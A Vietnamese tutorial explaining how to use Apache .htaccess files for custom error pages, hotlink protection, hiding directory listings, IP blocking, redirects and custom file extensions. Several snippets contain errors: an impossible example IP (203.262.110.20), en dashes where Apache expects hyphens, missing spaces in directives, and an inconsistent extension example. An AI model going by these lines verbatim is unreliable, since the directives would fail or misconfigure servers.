Trong quá trình làm việc với client, nếu có lỗi xảy ra (ví dụ như không tìm thấy tập tin) thì Apache sẽ báo lỗi bằng một trang có sẵn hiển thị mã số của lỗi đó, rất không đẹp và khó hiểu.

Với .haccess thì bạn có thể tự tạo các trang báo lỗi hay hơn. Để làm được điều này thì trong tập tin .htaccess bạn thêm dòng sau:

ErrorDocument mã số lỗi /trangloi.html

Trong đó mã số lỗi là mã số của lỗi phát sinh, sau đây là những lỗi hay gặp:

- 401 – Authorization Required (cần password để truy nhập)
- 400 – Bad request (Lỗi do yêu cầu)
- 403 – Forbidden (không được vào)
- 500 – Internal Server Error (lỗi server)
- 404 – Wrong page (lỗi trang, không tìm thấy…)

còn trangloi.html là trang web mà bạn muốn hiển thị khi lỗi phát sinh, có thể đưa vào tập tin này nội dung hay đồ hoạ gì tùy bạn, chẳng hạn liên kết trở về trang chính của trang web. Ví dụ: ErrorDocument 404/trangloi.html hoặc: ErrorDocument500/loi/500.html

Bây giờ bạn hãy tải (upload) 2 tập tin .htaccess và trangloi.html lên hosting của mình.

Chống ăn cắp băng thông (bandwidth)

Thông thường những dịch vụ lưu trữ web chỉ cung cấp cho bạn một lượng dữ liệu luân chuyển (data transfer) nhất định hàng tháng và khi bạn sử dụng hết lượng dữ liệu này, website của bạn sẽ tự động bị đóng cửa. Bạn sẽ phải trả thêm tiền cho lượng băng thông vượt quá hoặc phải buộc lòng chờ đến tháng sau.

Nếu hình ảnh, dữ liệu, … của bạn bị các website khác “ăn trộm” (bằng các thủ thuật đơn giản) làm cho lượng dữ liệu luân chuyển của bạn tăng lên, thì có nghĩa là bạn sẽ phải trả tiền cho cái mà bạn không sử dụng. Sử dụng tập tin .htaccess là một giải pháp hoàn hảo, để ngăn chặn việc sử dụng hình ảnh trái phép trên website của bạn. Bạn chỉ việc đưa vào tập tin .htaccess nội dung sau :

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?trangweb\.com/.*$ [NC]
RewriteRule \.(gif|jpg)$ – [F]

Ở đoạn mã trên tôi sử dụng module Rewrite của máy chủ Apache, bạn chỉ việc thay đổi trangweb.com thành địa chỉ website của mình.

Có thể sử dụng một hình ảnh nào đó cảnh cáo những kẻ “ăn trộm” băng thông, bạn dùng dòng lệnh sau:

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?trangweb\.com/.*$ [NC]
RewriteRule \.(gif|jpg)$ http://www.trangweb.com/diehotlinker.jpg [R,L]

Không cho hiện danh sách tập tin trong thư mục

Trong trường hợp một thư mục nào đó không có tập tin index hoặc default, Apache sẽ hiển thị một danh sách liệt kê những tập tin có trong thư mục đó. Tuy nhiên nếu đây là những tài liệu nhạy cảm, bạn không muốn người khác thấy, hãy thêm lệnh sau vào tập tin .htaccess

Options –Indexes

Thay thế trang index

Thông thường khi truy nhập vào một trang web, Apache sẽ tìm tập tin index.htm hoặc default.htm trả kết quả về cho trình duyệt, bạn có thể dùng .htaccess thay đổi mặc định này.

DirectoryIndex index.php index .php3 messagebrd.pl index.html index.htm

Với dòng lệnh này thì tất cả các tập tin được liệt kê sẽ được tìm theo thứ tự khi có yêu cầu tới thư mục hiện hành, trang nào được tìm thấy đầu tiên sẽ thành trang index của thư mục.

Cấm/hạn chế IP truy nhập

Một số người muốn làm ngập (flood) trang web của bạn, việc cần làm là ngăn cấm những IP của những người này truy nhập vào trang web, bạn thêm đoạn mã sau vào .htaccess: deny from 203.262.110.20; cho phép IP truy nhập: allow from 203.262.110.20.

Nếu bạn chỉ viết IP dưới dạng: 203.262.110 thì sẽ cấm tất cả IP trong dải từ 203.262.110.1 đến 203.262.110.254.

Sử dụng dòng lệnh sau: Deny from all sẽ cấm tất cả mọi truy nhập đến các trang web trong thư mục, tuy nhiên các tập tin trong đó vẫn có thể được sử dụng từ bên ngoài thông qua các lệnh dạng require hay include (trong lập trình PHP), có thể xem thêm mã nguồn của PHPBB forum,IBF… để hiểu rõ hơn.

Tự động chuyển đến địa chỉ mới (Redirection)

Bạn chuyển trang web của mình đến địa chỉ mới nhưng không phải ai cũng biết điều này, redirect truy nhập từ xa một cách đơn giản bằng lệnh sau:

Redirect/olddirectory http://www.trangwebmoi.com/thumucmoi ;

Tuỳ biến đuôi tập tin

Thông thường, tuỳ thuộc vào ngôn ngữ lập trình web mà bạn sử dụng tập tin sẽ có phần mở rộng khác nhau như: html, htm, asp, aspx, php, cgi, …Tuy nhiên nếu sử dụng .htaccess bạn có thể tác động vào máy chủ Apache, Apache sẽ gọi đến tập tin của bạn và trả về cho trình duyệt web của người dùng với phần mở rộng do bạn quy định trong .htaccess. Bạn sử dụng đoạn lệnh sau trong tập tin .htaccess:

RewriteEngine on
RewriteRule (.*)\.dll$ $1.html

Html là phần mở rộng thực sự của những tập tin trên website, dll là phần mở rộng do bạn lựa chọn. Lưu ý trong liên kết trên trang web, bạn phải gọi đúng đường dẫn đến tập tin với phần mở rộng mới (ở trên là dll), ví dụ http://www.trangweb.com/index.htm

Lưu ý khi sử dụng tập tin .htaccess:

- Chỉ áp dụng trên máy chủ Apache đã bật chế độ .htaccess, nếu chưa bạn hãy thử liên hệ với nhà cung cấp dich vụ hosting.

- Để tạo ra tập tin này bạn có thể sử dụng ngay chương trình Notepad của Windows: chọn chế độ save as với tên .htaccess, nhưng khi lưu nhớ bỏ đuôi txt.

-.htaccess chỉ có tác dụng đối với những tập tin ngang hàng (trong cùng thư mục với nó) hoặc thư mục con. Với thư mục, nó chỉ có tác dụng trong thư mục chứa nó và thư mục con, còn vô tác dụng với thư mục mẹ (parent directory).

- Bạn có thể dùng một số chương trình FTP (Leaf FTP, WS FTP, Cute FTP) để tải tập tin .htaccess lên hosting của mình với chế độ ASCII, nếu nó không hoạt động bạn thử CHMOD với giá trị 644.